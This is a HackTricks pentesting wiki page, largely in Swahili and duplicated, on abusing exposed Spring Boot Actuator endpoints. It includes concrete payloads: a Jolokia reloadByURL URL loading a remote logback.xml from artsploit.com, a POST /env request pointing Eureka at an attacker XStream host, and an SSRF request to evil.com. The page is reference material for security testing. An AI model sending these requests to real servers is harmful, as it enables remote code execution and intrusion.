Spring Actuators

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Spring Auth Bypass

From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Key Points:

Spring Boot Actuators hujaza mwisho kama /health, /trace, /beans, /env, nk. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 na kuendelea, tu /health na /info hazina nyeti kwa default, lakini waendelezaji mara nyingi huondoa usalama huu.
Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
/dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, na /heapdump.
Katika Spring Boot 1.x, actuators hujaza chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi /actuator/.

Exploitation Techniques:

Remote Code Execution via '/jolokia':

Mwisho wa actuator /jolokia unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.
Kitendo cha reloadByURL kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Remote Code Execution kupitia mipangilio ya XML iliyoundwa.
Mfano wa URL ya exploit: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

Config Modification via '/env':

Ikiwa Maktaba za Spring Cloud zipo, mwisho wa /env unaruhusu mabadiliko ya mali za mazingira.
Mali zinaweza kubadilishwa ili kutumia udhaifu, kama vile udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.
Mfano wa ombi la POST la exploit:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

Other Useful Settings:

Mali kama spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, na spring.datasource.tomcat.max-active zinaweza kubadilishwa kwa exploits mbalimbali, kama vile SQL injection au kubadilisha nyuzi za muunganisho wa database.

Additional Information:

Orodha kamili ya actuators za default inaweza kupatikana hapa.
Mwisho wa /env katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki kuwa sawa.

Env + H2 RCE:

Maelezo juu ya kutumia mchanganyiko wa mwisho wa /env na H2 database yanaweza kupatikana hapa.

SSRF on Spring Boot Through Incorrect Pathname Interpretation:

Usimamizi wa Spring framework wa vigezo vya matrix (;) katika majina ya njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF).
Mfano wa ombi la exploit:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSource code Review / SAST Tools NextSymfony

Last updated 6 days ago

Exploiting Spring Boot Actuators

Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Key Points:

Spring Boot Actuators hujaza mwisho kama /health, /trace, /beans, /env, nk. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 na kuendelea, tu /health na /info hazina nyeti kwa default, lakini waendelezaji mara nyingi huondoa usalama huu.

Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:

/dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, na /heapdump.

Katika Spring Boot 1.x, actuators hujaza chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi /actuator/.

Exploitation Techniques:

Remote Code Execution via '/jolokia':

Mwisho wa actuator /jolokia unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.

Kitendo cha reloadByURL kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Remote Code Execution kupitia mipangilio ya XML iliyoundwa.

Mfano wa URL ya exploit: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

Config Modification via '/env':

Ikiwa Maktaba za Spring Cloud zipo, mwisho wa /env unaruhusu mabadiliko ya mali za mazingira.

Mali zinaweza kubadilishwa ili kutumia udhaifu, kama vile udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.

Mfano wa ombi la POST la exploit:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

Other Useful Settings:

Mali kama spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, na spring.datasource.tomcat.max-active zinaweza kubadilishwa kwa exploits mbalimbali, kama vile SQL injection au kubadilisha nyuzi za muunganisho wa database.

Additional Information:

Orodha kamili ya actuators za default inaweza kupatikana hapa.

Mwisho wa /env katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki kuwa sawa.

Env + H2 RCE:

Maelezo juu ya kutumia mchanganyiko wa mwisho wa /env na H2 database yanaweza kupatikana hapa.

SSRF on Spring Boot Through Incorrect Pathname Interpretation:

Usimamizi wa Spring framework wa vigezo vya matrix (;) katika majina ya njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF).

Mfano wa ombi la exploit:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Spring Auth Bypass

Exploiting Spring Boot Actuators

Key Points:

Exploitation Techniques:

Additional Information:

Related Topics:

Spring Auth Bypass

Exploiting Spring Boot Actuators

Key Points:

Exploitation Techniques:

Additional Information:

Related Topics: